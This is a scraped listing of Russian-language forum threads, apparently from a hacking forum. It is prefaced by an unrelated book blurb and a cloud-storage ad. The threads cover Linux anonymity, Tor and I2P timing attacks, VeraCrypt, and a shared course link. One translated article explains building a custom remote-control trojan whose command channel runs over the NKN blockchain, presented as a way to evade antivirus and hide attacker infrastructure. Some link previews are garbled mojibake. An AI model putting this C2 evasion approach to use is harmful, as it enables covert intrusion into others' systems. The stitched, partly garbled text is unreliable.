Книга знакомит читателя с современными концепциями активного поиска угроз и исследования передового вредоносного ПО с примене нием свободно распространяемых инструментов и фреймворков для анализа памяти. В издании принят практический подход, используются образы памяти из реальных инцидентов. Прочтя книгу, вы сможете самостоятельно создавать и анализировать дампы памяти, изучать действия пользователя, искать следы бесфайловых атак и реконструировать действия злоумышленников. Издание адресовано специалистам по реагированию на инциденты, аналитикам кибербезопасности, системным администраторам, а также может быть полезно студентам вузов и инженерам из смежных областей.

Файл из Облака Mail.ru

Облако Mail.ru - это ваше персональное надёжное хранилище в интернете.

cloud.mail.ru

Анонимность в использовании Linux

ID: 676533bbb4103b69df371a8a
Thread ID: 79629
Created: 2023-01-10T08:49:19+0000
Last Post: 2023-01-15T12:11:13+0000
Author: SenjorZeroday
Prefix: Статья
Replies: 11 Views: 1K

На написании этой статьи мне сподвигли частые вопросы в коментариях от новых жителей форума, которые без особых навыков пытаються влезть и стать специалистами в области сетевой безопасности, или же юзать малвари и стиллеры , не задумываясь что всё начинаеться с лично безопасности, и так, берём сок и утренний тост и читаем!

Обеспечение анонимности на рабочей машине на Linux может быть важным для защиты конфиденциальной информации и повышения безопасности в целом. Есть несколько способов обеспечить анонимность на вашей рабочей машине, включая использование анонимных прокси-серверов, VPN и анонимных браузеров. В этой статье я буду рассматривать некоторые из этих методов и приведу примеры настройки через командную строку.

-Использование анонимных прокси-серверов: Можно использовать анонимный прокси-сервер для проксирования соединений интернета. Это позволит вам оставаться анонимным при посещении веб-сайтов и использовании интернет-услуг. Например, можно использовать команду export для настройки переменной окружения http_proxy, настройка прокси - сервера:

Code:Copy to clipboard

export http_proxy="http://<username>:<password>@<proxy_host>:<proxy_port>" export https_proxy=$http_proxy

-Использование VPN: Использование VPN-клиента позволяет создавать зашифрованное соединение с VPN-сервером, что позволяет предотвратить прослушивание и перехват данных ваших сетевых коммуникаций. Например, можно использовать команду openvpn для подключения к VPN-серверу:

Code:Copy to clipboard

sudo openvpn --config /path/to/vpn.conf

-Использование анонимных браузеров: Использование анонимных браузеров, таких как Tor Browser , позволяет предотвратить отслеживание вашего интернет-браузера и защитить вашу анонимность в сети. Для запуска Tor Browser можно использовать команду ./start-tor-browser.desktop из директории, в которую вы распаковали браузер.

Важно отметить, что даже используя все эти методы, нельзя гарантировать полную анонимность в интернете. Важно следить за своей активностью в сети и быть осторожным при вводе конфиденциальной информации. Дополнительно рекомендую изучить различные способы обеспечения конфиденциальности, например, использование криптографии, смену своей IP адрес и использование специализированных приложений и сервисов.

Некоторые из них, к примеру:

использование специализированных дистрибутивов системы, таких как Tails , которые созданы специально для обеспечения анонимности и конфиденциальности;

использование специализированного ПО для блокирования трекеров и рекламных сетей;

использование специализированных VPN с опцией "No Log " и криптографическими протоколами.

В любом случае, помните, что никакой метод не может гарантировать полную анонимность в интернете и необходимо быть осторожным и знать свои данные. Так же важно понимать, что некоторые методы могут иметь свои ограничения, так как некоторые сайты могут заблокировать доступ или ограничить функциональность для пользователей, использующих анонимность технологии.

это лишь обзор на некоторые из методов обеспечения анонимности на Linux с примерами настройки через командную строку, если вам необходимо более глубокое и подробное изучение рекомендую почитать специализированную литературу.

911.re alternative?

ID: 676533bbb4103b69df371a92
Thread ID: 76219
Created: 2022-11-19T22:42:53+0000
Last Post: 2022-12-07T15:04:07+0000
Author: lildvrkie
Replies: 10 Views: 1K

Any suggestions? It’s what I would always use but I guess it’s burnt toast now.

Как грамотно запустить весь траффик в линукс через тор?

ID: 676533bbb4103b69df371ab2
Thread ID: 72047
Created: 2022-08-22T00:10:34+0000
Last Post: 2022-09-28T16:32:51+0000
Author: Pulp Fiction
Replies: 30 Views: 1K

Кроме как юзать whonix, в винде с этим успешно справляется proxifier, да и в маке тоже, а вот для линуха версии к сожалению нет... Ставить whonix и виртуалку тока ради того что бы весь траффик шёл через тор (когда это можно сделать в любом линуксе) или что бы железо не палилось - совсем не хочется... А хочется что бы в кали весь траффик юзал тор да и что бы днсы юзались удалённого тора. Что бы просто открыл браузер тора и создался локал хост на порту 9150 (сокс короче) и весь траффик шёл через него...

SEC504: Хакерские инструменты, методы, эксплойты и обработка инцидентов

ID: 676533bbb4103b69df371ab5
Thread ID: 56132
Created: 2021-09-01T10:22:10+0000
Last Post: 2022-09-24T18:12:34+0000
Author: rrv321
Prefix: Мануал/Книга
Replies: 2 Views: 1K

SEC504 подготовит вас к борьбе с компьютерными злоумышленниками. В этом курсе рассматриваются новейшие передовые векторы коварных атак, атаки типа «старомодный, но полезный», которые до сих пор так распространены, и все, что между ними. Вы узнаете самые современные, пошаговые процессы реагирования на инциденты; как злоумышленники подрывают системы, чтобы вы могли подготовить, обнаружить и отреагировать на них; и как обнаружить дыры в вашей системе до того, как это сделают плохие парни. Вместо того, чтобы просто научить вас нескольким приемам хакерских атак, этот курс даст вам практический опыт, предоставит вам исчерпывающий план обработки инцидентов и поможет понять юридические вопросы, связанные с реагированием на компьютерные атаки, включая мониторинг сотрудников, работу с правоохранительные органы и работа с доказательствами.

Что вы узнаете
Интернет полон мощных хакерских инструментов, и плохие парни их активно используют. Если у вашей организации есть подключение к Интернету или один или два недовольных сотрудника (а у кого его нет!), Ваши компьютерные системы будут атакованы. От сотен до тысяч ежедневных проверок вашей интернет- инфраструктуры до злонамеренного инсайдера, медленно проникающего через ваши самые важные информационные ресурсы, злоумышленники атакуют ваши системы со все большей злобой и скрытностью. Как защитники, важно, чтобы мы понимали эти хакерские инструменты и методы.

Ты выучишь:
Как лучше всего подготовиться к возможному нарушению
Пошаговый подход, используемый многими компьютерными злоумышленниками
Проактивная и реактивная защита на каждом этапе компьютерной атаки
Как определить активные атаки и взломы
Последние векторы компьютерных атак и как их остановить
Как правильно сдерживать атаки Как сделать так, чтобы злоумышленники не вернулись
Как восстановиться после компьютерных атак и восстановить системы для бизнеса
Как понимать и использовать инструменты и методы взлома
Стратегии и инструменты для обнаружения каждого типа атак
Уязвимости, атаки и защиты на уровне приложений
Как разработать процесс обработки инцидентов и подготовить команду к битве
Правовые вопросы при обработке инцидентов

видео + лабы + доп материалы

Hidden content for authorized users.

https://cloud.mail.ru/public/Uij7/3fsNbMmmL

Is RDP over Tor possible?

ID: 676533bbb4103b69df371ac9
Thread ID: 65688
Created: 2022-04-16T09:58:45+0000
Last Post: 2022-08-25T20:42:52+0000
Author: kitsunefx
Replies: 29 Views: 1K

Is RDP over Tor even possible? If so, how would it be done?

Двойное дно VeraCrypt. Сильно ли бьёт по скорости?

ID: 676533bbb4103b69df371ad9
Thread ID: 69702
Created: 2022-07-05T16:35:40+0000
Last Post: 2022-08-13T23:52:55+0000
Author: dontlookhere7434323
Replies: 38 Views: 1K

Купил себе новый ssd-шник, хочу поставить на него веру с дд, вопрос к тем кто юзал это - насколько сильно бьёт по скорости? Есть ли какие-то лаги, фризы и подобное?

Анонимный пульт дистанционного управления на основе сети блокчейн

ID: 676533bbb4103b69df371ae0
Thread ID: 71339
Created: 2022-08-08T21:15:45+0000
Last Post: 2022-08-09T00:35:32+0000
Author: вавилонец
Prefix: Статья
Replies: 2 Views: 1K

Оригинальная статья
Переведено специяльно для XSS.IS
Камнями кидать в Jolah Milo vski

0x00 Надо тестить, ребята

Содержимое, описанное в этой статье, предназначено только для технических обсуждений и исследований.Все среды являются экспериментальными средами, и нет нарушений, связанных с повреждением компьютера. Все инструменты в этой статье предназначены только для исследовательских целей, и пользователи несут ответственность за все последствия.

0x01 Предисловие

Благодаря инновациям в сетевых технологиях и обновлению антипрограммного обеспечения брандмауэра троян для удаленного управления уже давно превратился в различные варианты троянов HTTP/HTTPS/DNS. В настоящее время наиболее часто используется cobaltstrike/msf, чтобы избежать уничтожения шелл-кода, различных загрузчиков, инъекций процессов и т. д., чтобы обойти убивающее программное обеспечение. Но лучший способ обойти антивирус — написать программу для удаленного управления самостоятельно.
Прежде чем писать , мы должны подумать об основных характеристиках текущего cobaltstrike и msf при их обратном подключении, а также о характеристиках поведения. Функция обратного соединения? Обратное соединение через ссылку IP / доменное имя / CDN? Опредение поведенческих характеристик можно избежать, написав клиент удаленного управления самостоятельно. Если IP/доменное имя/сервер должны быть приобретены с использованием информации о реальном имени/метода оплаты, анонимность значительно снижается. Всегда есть риск разоблачения. / анонимностью мы здесь занимаемся или кашу варим /
Итак, как реализовать удаленное управление без какой-либо информации о реальном имени без IP/доменного имени/сервера, является основной проблемой, обсуждаемой в этой статье. Так что вам нужно подумать, как добиться проникновения без IP/доменного имени? P2P? Что не так с блокчейном?

Сеть 0x02 P2P на основе сети блокчейна NKN

Все клиенты/серверы напрямую связаны с официальными узлами/узлами майнинга NKN, пользователи которых присоединяются к сети NKN, и все узлы знают только соседние узлы. На данный момент клиент и сервер в сети почти равны. В случае отсутствия общедоступного сетевого IP-порта серверу необходимо только иметь возможность подключения к внешней сети и иметь права доступа к внешней сети, и его можно использовать в качестве подключенного объекта.

Перейти к реализации клиента NKN и кошелька SDK. SDK состоит из несколько компонентов:

Клиент NKN : бесплатно отправляйте и получайте данные между любыми клиентами NKN. независимо от состояния их сети, не настраивая сервер и не полагаясь на любые сторонние сервисы. По умолчанию данные шифруются сквозным шифрованием. Обычно вы можете использовать мультиклиент вместо клиента напрямую.

NKN MultiClient : отправка и получение данных с использованием нескольких NKN клиентов одновременно для повышения надежности и задержки. Кроме того, это поддерживает режим сеанса, надежный протокол потоковой передачи, аналогичный TCP, основанный на нкп .

Кошелек NKN : SDK кошелька для NKN блокчейн . Его можно использовать для создания кошелька, перевести токен на адрес кошелька NKN, зарегистрировать имя, подписаться на тему и т. д.

Преимущества использования NKN клиента/мультиклиента для передачи данных:

Независимость от сети: ни отправитель, ни получатель не должны иметь общедоступный IP-адрес. или перенаправление портов. Клиенты NKN устанавливают только исходящий трафик (веб-сокет) связи, поэтому доступ в Интернет — это все, что им нужно. Это идеально для клиента стороннее одноранговое общение.

Безопасность высшего уровня: все данные проходят сквозную аутентификацию и шифрование. Нет кто-то еще в мире, кроме отправителя и получателя, может видеть или изменять содержимое данных. Один и тот же открытый ключ используется как для маршрутизации, так и для шифрования. исключая возможность атаки человека посередине.

Достойная производительность: путем одновременного агрегирования нескольких путей наложения, мультиклиент может получить сквозную задержку ~ 100 мс и сквозную сессию 10+ Мбит / с. пропускная способность между международными устройствами.

Все бесплатно, с открытым исходным кодом и децентрализовано. (Если вам интересно, узел ретранслируйте трафик для клиентов бесплатно, чтобы получать вознаграждение за майнинг в блокчейне NKN.)

https://github.com/nknorg/nkn-sdk-go

Используя NKN sdk, можно быстро внедрить клиент с функцией передачи сообщений.Поскольку в сети P2P нет очевидной разницы между клиентом и сервером, далее он будет называться контрольным концом C2 и контролируемым концом.

0x03 Общий процесс выполнения удаленного управления

0x04 Процесс выполнения NGLite

Через сеть NKN может быть реализовано общение анонимной группы, аналогично каналу чата, каждый отправитель может напрямую отправить сообщение получателю, и сообщение передается через разные узлы в сети nkn.

0x05 добиться эффекта

Здесь мы только предлагаем вам самую простую идею для реализации вашей собственной программы c2.
Контролируемый конец программы связывается с nkn после первоначального запуска и отправляет свой собственный идентификатор на управляющий конец.
Никакие команды и связанные с ними операции не будут выполняться до тех пор, пока не будет получена команда выполнения с терминала управления.

0x06 А ну-ка кинем на ВТ

https://github.com/Maka8ka/NGLite

0x07 По -итогу

На этом этапе вы можете быстро реализовать удаленное управление через sdk блокчейна nkn. Преимущества: анонимность, отсутствие покупки каких-либо общедоступных сетевых ресурсов на реальное имя и высокая скорость. Недостатки: Привязка к официальным доменным именам типа nkn.org (можно обойти некоторыми методами), клиент громоздкий.

Если кто потестит или уже - приглашаю коментировать.

Транзитный трафик I2P: дыхание сети и важное требование анонимности

ID: 676533bbb4103b69df371ae1
Thread ID: 71115
Created: 2022-08-04T05:49:31+0000
Last Post: 2022-08-08T07:45:33+0000
Author: peacemaker
Prefix: Статья
Replies: 1 Views: 1K

I2P — один из ведущих игроков среди анонимных сетей. Наряду с ней мелькают проекты ZeroNet, FreeNet и прочие. По субъективным оценкам автора, I2P является вторым проектом по величине после TOR.

"Проект невидимого интернета" (aka I2P) может похвастаться полной независимостью разработки от юридических и государственных лиц, планомерным и долгим развитием, а также высококлассной криптографией в профессиональном исполнении на продакшн-языках C++ и Java (против студенческих поделок на интерпретируемых медленных языках).

Важно заметить, что разработка двух клиентов сети (на C++ и на Java) ведется разными группами людей, которые фактически независимы друг от друга. Естественно, что это не мешает им согласовывать и внедрять нововведения в протокол сети. Разработка децентрализована и обсуждения прозрачны, что хорошо сказывается на доверии к конечному продукту (логи IRC-чатов: команда C++, команда Java и общий чат для запланированных обсуждений).

Если тема противодействия цензуре не вызывает дискомфорт и у вас имеется энтузиазм для изучения чего-то нового, дух I2P придется вам по душе.

I2P является одноранговой сетью, работающей поверх обычного интернета в виде дополнительного зашифрованного транспортного уровня (также читайте I2P через Yggdrasil Network). В отличие от маршрутов в обычной сети, путь следования трафика в I2P непредсказуем — трафик, проходя от пользователя до пункта назначения, преодолевает в среднем 6 случайных транзитных узлов, которыми являются другие участники I2P.

В отличие от того же TOR, где канал связи двунаправлен, трафик I2P течет по однонаправленным туннелям. Таким образом пакеты до сервера идут через, например, случайные узлы в России, Казахстане и Европе, а ответ сервера до пользователя через США, Канаду и Японию. Каждые десять минут все зашифрованные туннели связи обновляются, принимая абсолютно новый логический рисунок и криптографические ключи. Поначалу такое сложно даже вообразить: пользователь не знает физическое месторасположение сервера, к которому обращается, а сервер ничего не знает о пользователе, благодаря транзитным узлам, которые сами не имеют возможности знать кого они обслуживают.

Транзитными узлами I2P, через которые строятся маршруты, являются не доверенные серверы мировых организаций, институтов или кого-то еще, а главным образом узлы обычных участников сети. Все пользователи I2P по умолчанию могут быть транзитными узлами. Если для вас это новость, не волнуйтесь: архитектура I2P не подразумевает выходных прокси в обычный интернет, поэтому с вашего IP- адреса никто не откроет сомнительную страничку, чтобы проставить лайки. В рамках самой сети I2P IP-адреса участников сети, от которых приходят прямые подключения, априори имеют примерно нулевую значимость, так как подобный адрес — это всего лишь адрес десятиминутного транзитного звена, который при всем желании сам не знает кто и что через него передает.

По умолчанию I2P-роутер, то есть приложение для выхода в эту скрытую сеть, имеет очень низкий порог для транзитного потока — всего 32КБ/сек (это нужно, чтобы пользователи с ограниченным трафиком по незнанию не остались у разбитого корыта через пару дней использования I2P). Чтобы увеличить транзитный канал на i2pd (клиент сети на C++), укажите в конфигурационном файле значение bandwidth = X (буква X означает неограниченный канал).

Увеличить транзит, предоставить свой канал для каких-то неизвестных пользователей?! С какой стати вам отдавать свои мощности на благо сети? Это главный вопрос статьи, который далеко не ограничивается альтруизмом!

Постановка вопроса
Мы привыкли запускать приложение только тогда, когда нам нужен его функционал. Например, открыть страницу интернет-магазина, чтобы сделать покупку. Всё просто.

Однако, когда дело касается анонимности и скрытых сетей, первым делом на ум приходит тайминг-атака (timing attack). Ее суть в синхронизации событий: наблюдатель при помощи специальных технических средств мониторит движение трафика в географическом регионе и следит за активностью личности в скрытой сети, которую хочет сопоставить с реальным человеком. По заверению некоторых специалистов, вычисление конкретного пользователя сети TOR по данной методике требует менее пяти временных точек. Это достигается засчет того, что в городе, области или стране сетью TOR пользуется ограниченное количество человек. Главным подозреваемым становится тот, кто в течение всех контрольных замеров в момент публикации на анонимном форуме или чате подключен к сети TOR. Нужно особо отметить, что тайминг-атака не подразумевает расшифровку защищенного соединения. Вся эффективность метода заключается в усидчивости и внимательности наблюдателя.

Глубокий анализ трафика или DPI (Deep Packet Inspection) повсеместно применяется в системах интернет-контроля (например, СОРМ в России). Подобные технологии позволяют с большой вероятность сказать какому протоколу или приложению принадлежит проходящий трафик, что, следовательно, позволяет понять чем примерно занимается или интересуется абонент.

Использование VPN мало эффективно против тайминг-атаки в скрытой сети, так как наблюдатель может отслеживать наличие трафика не только специфичного для сети TOR, но производить сопоставления с любыми другими анонимными потоками информации.

Все серьезные проекты, нацеленные на анонимность и устойчивость перед цензурой, имеют различные инструменты для обмана DPI и обхода блокировок своего протокола. Без сомнений: I2P среди них. Чтобы воспользоваться всей мощностью I2P не нужны дополнительные плагины, как, например в TOR. Всё работает по умолчанию — нужно только периодически обновлять свой I2P-роутер (приложение для выхода в сеть), чтобы быть в тренде технологий.

Не будем вдаваться в сложные технические детали и демагогию, так как в конечном счете сколько бы пользователь не прятался, если его трафик не идентичен открытию новостных порталов государственной пропаганды, при первом же случае он станет подозреваемым в использовании чего-то этакого.

Зачем юзеру транзит
Тайминг-атака в общем случае строится на возможности наблюдателя мониторить активность абонента. Например, когда вы смотрите потоковое видео, провайдеру виден большой поток данных. Если ваш тарифный план подразумевает ограничение по трафику, каждый полученный вами байт тарифицируется. Это как нельзя нагляднее демонстрирует прозрачность пользовательской активности для оператора связи. Соответственно, когда вы спите, провайдер видит затишье.

Представим, что пользователь разместил на своем компьютере персональный сайт и предоставил к нему доступ из скрытой сети. Если кому-то вдруг станет интересно кто является владельцем ресурса, навряд ли он предпримет попытку взломать сложный транспортный протокол. В дело пойдут различные приемы от социальной инженерии до тайминг-атаки.

Упрощенно говоря, тайминг-атака может вестись так: на скрытый сайт одновременно направят тысячи запросов и будут наблюдать в каком месте обычного интернета появился всплеск активности, то есть куда все эти запросы прилетели. Задача масштабная, но и неуловимый Джо неуловим только до тех пор, пока никому не нужен.

Представим, что на сайт никто не заходит и активность интернет-канала сервера практически на нуле. Вдруг одномоментно наблюдатель отправляет с разных устройств большое количество запросов на сервер (производит примитивную DDoS- атаку). Проходя запутанные туннели скрытой сети, все запросы доходят до сервера и его реальный сетевой канал испытывает очевидный прирост нагрузки.

Если искомый сервер физически находится в подконтрольном сегменте интернета, например, на территории страны, чьи спецслужбы проводят операцию, будет достаточно нескольких совпадений в разное время суток, чтобы с уверенностью сказать где на самом деле хостится скрытый сайт.

Примерно также тайминг-атака применяется к обычным пользователям: сопоставляется виртуальная активность и реальные всплески активности абонентов. На практике всё несколько сложнее, но это нюансы, которые не интересуют нас в рамках этой статьи.

Теперь представим, что активность интернет-канала сервера или пользовательского устройства никак не зависит от его полезной активности (то есть реальных действий). Это возможно, если сетевой канал всегда под нагрузкой. В таком случае наблюдения извне бесполезны, так как реальная активность не более, чем погрешность в бурном и постоянно скачущем потоке транзитного трафика. Это явление можно сравнить с шумом: если у вас дома громко играет музыка, вы можете кричать до хрипоты, а при встрече соседи скажут лишь, что вы слишком громко слушаете Баскова.

На скриншоте ниже видна разница между Sent и Transit в веб-консоли i2pd, из которой видно, что из 9TiB исходящих пакетов сервер отдал всего около 6GiB своей реальной информации обратившимся к нему пользователям.

Тот факт, что эти 6 гибибайт невозможно вычленить из всего зашифрованного потока при наблюдении со стороны и есть наглядная иллюстрация пользы большого транзита в качестве гаранта от возможных тайминг-атак.

При большом количестве транзитных туннелей, I2P-роутер строит свои туннели с использованием роутеров, вместе с которыми составляет чужие транзитные туннели. Наложение своей информации на туннели других участников превращает связи I2P-роутеров в неразрешимый клубок зашифрованных лабиринтов, не поддающийся анализу со стороны.

Как получить много транзита
Для начала обратите внимание на настройки I2P-роутера, о которых мы говорили в начале статьи.

I2P-роутеры связываются между собой напрямую. Следовательно, чтобы ваш узел принимал много транзита, он должен быть легкодоступен. Иначе говоря, у вас должен быть выделенный IP-адрес для приема обращений извне, но и для домашнего ПК или смартфона с "серым" IP-адресом тот малый транзит, который всё равно будет, является хорошим подспорьем для погрешности в наблюдениях со стороны. Несмотря на отсутствие выделенного IP-адреса, I2P-роутеры все равно умеют устанавливать прямой контакт (об этом можете почитать тут).

У каждого I2P-роутера есть функция профилирования, которая помогает выбирать надежные узлы в качестве транзитных — чем стабильнее онлайн вашего узла, тем более он предпочтителен для построения туннелей другими участниками.

Если по каким-то причинам вам придется надолго выключить свой "раскаченный" сервер или ПК, вы спровоцируете множество неудачных попыток подключения от других участников сети, из-за чего ваш статус надежного узла постепенно сменится на ненадежный. В следствие этого, когда вы снова запуститесь, транзитный трафик сильно упадет. В i2pd профилированная информация считается актуальной три дня (в Java-версии примерно также), после чего I2P-роутер вновь готов проверить качество ранее ненадежного роутера и, если тот исправился, пометить его знаком качества. В виде альтернативы можно быстро начать "с чистого листа", удалив идентификатор роутера (файл router.info) и перезапустив I2P-роутер. В Debian этот файл лежит по умолчанию в папке /var/lib/i2pd/.

Открыть кингстоны
Чем больше в I2P узлов, тем более сеть распределена и устойчива перед анализом. Чем больше трафика на каждом узле, тем анонимнее вся сеть. Включая транзит для своих целей, вы помогаете всем. Помогая всем, вы обеспечиваете свою анонимность.

Если у вас не только безлимитный интернет, но и дисковое пространство, можете "пошуметь" с двойной пользой: ознакомьтесь со статьей про торренты в I2P.

P.S. Взято с хабр
P.S. Данная статья касается всех скрытых сервисов. Будь то cloudflare, tor и другие. Я позже напишу про tor.

Мультихоуминг в I2P — защита от тайминг-атаки и дополнительная гарантия аптайма

ID: 676533bbb4103b69df371ae5
Thread ID: 70936
Created: 2022-08-01T04:24:18+0000
Last Post: 2022-08-01T09:50:10+0000
Author: peacemaker
Prefix: Статья
Replies: 0 Views: 1K

Размещение веб-ресурса в скрытой сети подразумевает нежелание обнаружения физического местонахождения сервера. Когда профессионалы ставят своей целью раскрыть личность владельца той или иной площадки, в ход идет всё: от социальной инженерии до анализа метаданных изображений, размещенных на сайте и тому подобное. В рамках этой статьи нас интересует тайминг-атака, основанная на сопоставлении различных событий во времени и их логическая состыковка. Например, подозреваемый N вошел в дом, после чего через пять минут его предполагаемая виртуальная личность появилась в чате. В более реальных случаях время появления подозреваемого в сети может намекать на его часовой пояс. Подобных приемов наблюдательности не перечесть.

Опыт со сгоревшим дата-центром OVH показал, что от тайминг-атаки не защищены даже пользователи топовых ЦОД. Резкий уход в оффлайн нескольких сервисов в момент пожара отлично демонстрирует сужение круга подозреваемых - нужно искать среди клиентов пострадавшего дата-центра.

[ Ð Ð¡ÑÑÐ°ÑÐ±ÑÑÐ³Ðµ ÑÐ³Ð¾ÑÐµÐ» Ð´Ð°ÑÐ°-ÑÐµÐ½ÑÑ OVH SBG2

](https://habr.com/ru/news/t/546264/)

Ð¤Ð¾ÑÐ¾ DNA.FR / Jean-Christophe DORN 10 Ð¼Ð°ÑÑÐ° Ð² 02:42 Ð¿Ð¾ Ð¼Ð¾ÑÐºÐ¾Ð²ÑÐºÐ¾Ð¼Ñ Ð²ÑÐµÐ¼ÐµÐ½Ð¸ Ð¾Ð±Ð»Ð°ÑÐ½ÑÐ¼ Ð¿ÑÐ¾Ð²Ð°Ð¹Ð´ÐµÑÐ¾Ð¼ OVH Ð±ÑÐ»Ð¾ Ð¾Ð¿ÑÐ±Ð»Ð¸ÐºÐ¾Ð²Ð°Ð½Ð¾ Ð¾Ð¿Ð¾Ð²ÐµÑÐµÐ½Ð¸Ðµ Ð¾ Ð´ÐµÐ³ÑÐ°Ð´Ð°ÑÐ¸Ð¸ ÑÐµÑÐ²Ð¸ÑÐ° Ð² Ð´Ð°ÑÐ°-ÑÐµÐ½ÑÑÐµ SBG1 Ð² Ð¡ÑÑÐ°ÑÐ±ÑÑÐ³Ðµ, ÐºÐ¾ÑÐ¾ÑÐ¾Ðµ Ð¿Ð¾Ð·Ð¶Ðµ...

![habr.com](/proxy.php?image=https%3A%2F%2Fassets.habr.com%2Fhabr- web%2Fimg%2Ffavicons%2Ffavicon-16.png&hash=92e2dae146214fab23606c51ef42d36d&return_error=1) habr.com

В I2P существует прием, именуемый мультихоумингом. Термин "мультихоуминг" происходит он английских слов "multi" и "home" - на русский язык можно перевести, как "одновременное размещение веб-ресурса на нескольких хостах". Ниже рассмотрим суть этого явления.

Изложенный материал может быть полезен широкому кругу администраторов, студентов и любопытствующих, и никоим образом не имеет своей целью призвать читателя к противоправным действиям!

Ищи-свищи
Маршрутизация I2P описана в статье про флудфилы. Вкратце, суть сводится к следующему: внутрисетевой адрес привязывается к криптографическим ключам, которые локально хранятся на сервере.

Маршрутизация в сети I2P. Флудфилы

«Open Source» и «децентрализация» – это два основных шильдика, обеспечивающих хорошее первое впечатление о проекте. Нередко популярные проекты лукавят на эти темы, либо вовсе вводят своих...

![habr.com](/proxy.php?image=https%3A%2F%2Fassets.habr.com%2Fhabr- web%2Fimg%2Ffavicons%2Ffavicon-16.png&hash=92e2dae146214fab23606c51ef42d36d&return_error=1) habr.com

Простая реализация мультихоуминга не требует шаманских навыков, так как представляет из себя банальную развертку двух одинаковых веб-серверов, которые при одинаковых ключах имеют один и тот же I2P-адрес. В таком случае нельзя фактически предсказать на какой из двух серверов попадет пользователь. Да он, собственно, и сам не узнает.

Дабы схема была осмыслена, все сервера должны располагаться в разных местах (различные дата-центы, юрисдикции и даже континенты). Кстати говоря, серверов может быть не два, а хоть сотня. Если произойдет нацеленная атака, либо случайное ЧП с одним из серверов, ничего страшного не случится - пользователи будут получать лизсет от сервера, который по-прежнему находится в сети и никто не сможет сделать вывод о том, что в отключенном сервере или дата-центре хостился ваш скрытый веб-ресурс. В случае со статичными сайтами это готовая реализация, а для ресурсов с бэкэндом (базой данных и прочим) - все выведенные в I2P веб-серверы должны ссылаться на основной сервер, то есть выступать в роли прокси.

Здесь становится очевидно слабое место, от которого так пытались избавиться, - основной сервер. В некоторых конфигурациях возможно вообразить полное зеркалирование между двумя автономными серверами, однако в сложных и высоконагруженных проектах, использующих куки и различные базы данных, всё упирается хотя бы в один сервер, существующий в единственном экземпляре, потеря которого неизбежно скажется на работоспособности веб-ресурса (если ошибаюсь - развернуто опишите конфигурацию в комментариях). Очевидно, что критически важный сервер должен располагаться в самом надежном месте.

I2P не славится скоростью передачи информации, поэтому связь проксирующих серверов с основным в большинстве случаев целесообразно организовать через быстрое защищенное соединение вроде VPN или Yggdrasil. Если подходить с умом, надо стараться планировать архитектуру в стиле неуловимого Джо, чтобы скомпрометированный сервер-пустышка не мог служить подсказкой о размещении основного сервера... Оставим этот ребус на откуп читателю.

[ Yggdrasil Network: Заря бытовых меш-сетей, или Интернет будущего

](https://habr.com/ru/post/547250/)

Плавно наступает эпоха меш-сетей. Как минимум, этот термин все чаще и чаще появляется в информационной сфере. Что привлекает внимание сетевиков и почему в заголовке статьи фигурирует понятие «бытовая...

![habr.com](/proxy.php?image=https%3A%2F%2Fassets.habr.com%2Fhabr- web%2Fimg%2Ffavicons%2Ffavicon-16.png&hash=92e2dae146214fab23606c51ef42d36d&return_error=1) habr.com

Практическая реализация
На этот раз много букв о сложной конфигурации не получится, потому что всё предельно просто. На всех серверах-клонах создается обычный серверный туннель с использованием одинаковых ключей. Надо отметить, что одинаковыми должны быть не имена, указанные в конфиге, а именно файлы. Для этого необходимо скопировать ключ на каждый сервер, размещая его в рабочей директории i2pd. Как правило, это /var/lib/i2pd/, но точный путь можно всегда посмотреть в веб- консоли (параметр "Data path"). Тонкости проксирования сайтов выходят за рамки этой статьи, но тема легко гуглится и в банальных случаях выливается в несколько строк конфигурационного файла веб-сервера.

Если заинтересовались безопасным хостингом ресурсов в I2P, имеет смысл размещать на арендуемых серверах не основной ключ, который всецело отвечает за внутрисетевой адрес, а временный, кража которого не выльется в фатальную потерю. Подробнее об этом читайте в отдельном материале.

[ I2P tunnels configuration - i2pd documentation

](https://i2pd.readthedocs.io/en/latest/user-guide/tunnels/#i2p-tunnel- configuration)

![i2pd.readthedocs.io](/proxy.php?image=https%3A%2F%2Fi2pd.readthedocs.io%2Fen%2Flatest%2Fuser- guide%2Ftunnels%2F..%2F..%2Fmedia%2Fi2pd- logo.png&hash=f39ca82b41a3e1411d9ac02cc55b0dd7&return_error=1) i2pd.readthedocs.io

[ Проксирование сайта nginx proxy_pass at DuckDuckGo

](https://duckduckgo.com/?q=%D0%9F%D1%80%D0%BE%D0%BA%D1%81%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D0%BD%D0%B8%D0%B5+%D1%81%D0%B0%D0%B9%D1%82%D0%B0+nginx+proxy_pass&t=ffab&ia=web)

DuckDuckGo. Privacy, Simplified.

duckduckgo.com

[ Безопасное хранение ключей от сервиса в I2P

](https://habr.com/ru/post/557690/)

Сталкиваясь с потребностью в скрытом сервисе I2P , большинство вынуждено пользоваться услугами хостинг-провайдеров. Например, потому что нет возможности обеспечить хороший аптайм ресурса на домашнем...

![habr.com](/proxy.php?image=https%3A%2F%2Fassets.habr.com%2Fhabr- web%2Fimg%2Ffavicons%2Ffavicon-16.png&hash=92e2dae146214fab23606c51ef42d36d&return_error=1) habr.com

P.S. взято с habr
На мой взгляд хоть статья о i2p, но она наглядно показывает и про другие системы. Будь то cloudflare, tor и другие.

Атака на Tor

ID: 676533bbb4103b69df371ae6
Thread ID: 70719
Created: 2022-07-27T09:30:27+0000
Last Post: 2022-07-28T06:23:58+0000
Author: peacemaker
Prefix: Статья
Replies: 0 Views: 1K

Tor был разработан, чтобы обеспечить децентрализованную, цензуро-устойчивую сеть, которая сможет предложить пользователям Интернета и веб-сайтам, анонимность и безопасность, с помощью простых в использовании средств. Тем не менее, с момента появления Tor, очень многие его пользователи были задержаны или арестованы. В этой статье мы обсудим методы деанонимизации в сети Tor, которые доступны сегодня. Мы рассмотрим сбои в области трафика и времени, отказ в оперативной безопасности (OPSEC), фингерпринт и удаленное выполнение кода.

Попытки взлома сети Tor

Правительство тратит огромные деньги, чтобы раскрыть пользователей Tor’a. В 2014 году дочка «Ростеха», выиграла тендер за 3.9 млн. рублей «На исследование возможности получения технической информации о пользователях анонимной сети Tor». Несмотря на то, что «ЦНИИ ЭИСУ», ответственная за выполнение работ, не уложилась в срок и была вынуждена вернуть всю сумму обратно, работа была выполнена, а исследовательская информация была передана МВД.
